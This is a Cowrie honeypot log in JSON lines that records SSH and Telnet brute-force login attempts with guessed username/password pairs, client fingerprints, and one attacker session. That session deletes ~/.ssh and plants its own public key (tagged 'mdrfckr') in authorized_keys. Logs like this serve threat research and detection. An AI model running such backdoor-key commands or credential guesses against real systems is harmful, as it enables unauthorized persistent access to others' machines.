{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-08-28T03:21:38.317411Z","src_ip":"212.227.235.229","session":"48fe6b6948e8"}
{"eventid":"cowrie.login.failed","username":"lighthouse","password":"lighthouse123","message":"login attempt [lighthouse/lighthouse123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:21:38.401597Z","src_ip":"212.227.125.160","session":"200daff891e0"}
{"eventid":"cowrie.session.connect","src_ip":"43.155.183.111","src_port":52138,"dst_ip":"1.2.3.4","dst_port":22,"session":"47615f494bf4","protocol":"ssh","message":"New connection: 43.155.183.111:52138 (1.2.3.4:22) [session: 47615f494bf4]","sensor":"my-vps","timestamp":"2025-08-28T03:21:38.653852Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:21:38.663365Z","src_ip":"43.155.183.111","session":"47615f494bf4"}
{"eventid":"cowrie.login.success","username":"root","password":"q123456.","message":"login attempt [root/q123456.] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:21:38.920716Z","src_ip":"212.227.235.229","session":"48fe6b6948e8"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T03:21:38.939383Z","src_ip":"43.155.183.111","session":"47615f494bf4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:21:39.136822Z","src_ip":"212.227.235.229","session":"48fe6b6948e8"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T03:21:39.137512Z","src_ip":"212.227.235.229","session":"48fe6b6948e8"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T03:21:39.138429Z","src_ip":"212.227.235.229","session":"48fe6b6948e8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:21:39.373940Z","src_ip":"212.227.235.229","session":"48fe6b6948e8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:21:39.584641Z","src_ip":"212.227.235.229","session":"48fe6b6948e8"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T03:21:39.585307Z","src_ip":"212.227.235.229","session":"48fe6b6948e8"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:21:39.614293Z","src_ip":"212.227.125.160","session":"200daff891e0"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T03:21:39.685936Z","src_ip":"212.227.235.229","session":"48fe6b6948e8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:21:39.687002Z","src_ip":"212.227.235.229","session":"48fe6b6948e8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46106,"dst_ip":"1.2.3.4","dst_port":22,"session":"8531493271c8","protocol":"ssh","message":"New connection: 212.227.235.229:46106 (1.2.3.4:22) [session: 8531493271c8]","sensor":"my-vps","timestamp":"2025-08-28T03:21:39.780066Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-08-28T03:21:39.850394Z","src_ip":"212.227.235.229","session":"8531493271c8"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-08-28T03:21:39.947798Z","src_ip":"212.227.235.229","session":"8531493271c8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33320,"dst_ip":"1.2.3.4","dst_port":22,"session":"1a1c36a083fb","protocol":"ssh","message":"New connection: 212.227.235.229:33320 (1.2.3.4:22) [session: 1a1c36a083fb]","sensor":"my-vps","timestamp":"2025-08-28T03:21:40.154478Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:21:40.155490Z","src_ip":"212.227.235.229","session":"1a1c36a083fb"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:21:40.401829Z","src_ip":"212.227.235.229","session":"1a1c36a083fb"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T03:21:40.487317Z","src_ip":"212.227.235.229","session":"8531493271c8"}
{"eventid":"cowrie.login.failed","username":"lighthouse","password":"lighthouse123","message":"login attempt [lighthouse/lighthouse123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:21:41.143227Z","src_ip":"212.227.235.229","session":"1a1c36a083fb"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:21:41.590150Z","src_ip":"212.227.235.229","session":"8531493271c8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46107,"dst_ip":"1.2.3.4","dst_port":22,"session":"4122e5b4386b","protocol":"ssh","message":"New connection: 212.227.235.229:46107 (1.2.3.4:22) [session: 4122e5b4386b]","sensor":"my-vps","timestamp":"2025-08-28T03:21:41.689126Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-08-28T03:21:41.690003Z","src_ip":"212.227.235.229","session":"4122e5b4386b"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-08-28T03:21:41.795655Z","src_ip":"212.227.235.229","session":"4122e5b4386b"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:21:42.225481Z","src_ip":"212.227.235.229","session":"4122e5b4386b"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:21:42.328361Z","src_ip":"212.227.235.229","session":"48fe6b6948e8"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:21:42.329521Z","src_ip":"212.227.235.229","session":"4122e5b4386b"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:21:42.390552Z","src_ip":"212.227.235.229","session":"1a1c36a083fb"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":56188,"dst_ip":"1.2.3.4","dst_port":22,"session":"a484588e2373","protocol":"ssh","message":"New connection: 45.125.211.194:56188 (1.2.3.4:22) [session: a484588e2373]","sensor":"my-vps","timestamp":"2025-08-28T03:21:43.539019Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:21:43.546369Z","src_ip":"45.125.211.194","session":"a484588e2373"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:21:43.750684Z","src_ip":"45.125.211.194","session":"a484588e2373"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"password","message":"login attempt [oracle/password] failed","sensor":"my-vps","timestamp":"2025-08-28T03:21:44.582244Z","src_ip":"45.125.211.194","session":"a484588e2373"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:21:45.793453Z","src_ip":"45.125.211.194","session":"a484588e2373"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43758,"dst_ip":"1.2.3.4","dst_port":22,"session":"1529367eb934","protocol":"ssh","message":"New connection: 212.227.235.229:43758 (1.2.3.4:22) [session: 1529367eb934]","sensor":"my-vps","timestamp":"2025-08-28T03:21:45.929618Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:21:45.931704Z","src_ip":"212.227.235.229","session":"1529367eb934"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:21:46.183744Z","src_ip":"212.227.235.229","session":"1529367eb934"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:21:46.669503Z","src_ip":"43.155.183.111","session":"47615f494bf4"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"mysql123","message":"login attempt [mysql/mysql123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:21:46.930739Z","src_ip":"212.227.235.229","session":"1529367eb934"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:21:48.181347Z","src_ip":"212.227.235.229","session":"1529367eb934"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36406,"dst_ip":"1.2.3.4","dst_port":22,"session":"452c5525400b","protocol":"ssh","message":"New connection: 212.227.235.229:36406 (1.2.3.4:22) [session: 452c5525400b]","sensor":"my-vps","timestamp":"2025-08-28T03:21:57.499254Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:21:57.500329Z","src_ip":"212.227.235.229","session":"452c5525400b"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":15360,"dst_ip":"1.2.3.4","dst_port":22,"session":"639b1e9bdd7b","protocol":"ssh","message":"New connection: 45.125.211.194:15360 (1.2.3.4:22) [session: 639b1e9bdd7b]","sensor":"my-vps","timestamp":"2025-08-28T03:21:58.428430Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:21:58.446495Z","src_ip":"45.125.211.194","session":"639b1e9bdd7b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:21:58.649322Z","src_ip":"45.125.211.194","session":"639b1e9bdd7b"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"postgres123","message":"login attempt [postgres/postgres123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:21:59.530964Z","src_ip":"45.125.211.194","session":"639b1e9bdd7b"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:22:00.753365Z","src_ip":"45.125.211.194","session":"639b1e9bdd7b"}
{"eventid":"cowrie.session.connect","src_ip":"86.57.152.52","src_port":57215,"dst_ip":"1.2.3.4","dst_port":23,"session":"69314b9aeb67","protocol":"telnet","message":"New connection: 86.57.152.52:57215 (1.2.3.4:23) [session: 69314b9aeb67]","sensor":"my-vps","timestamp":"2025-08-28T03:22:03.237679Z"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:22:08.677527Z","src_ip":"212.227.125.160","session":"59bfaff0ce0e"}
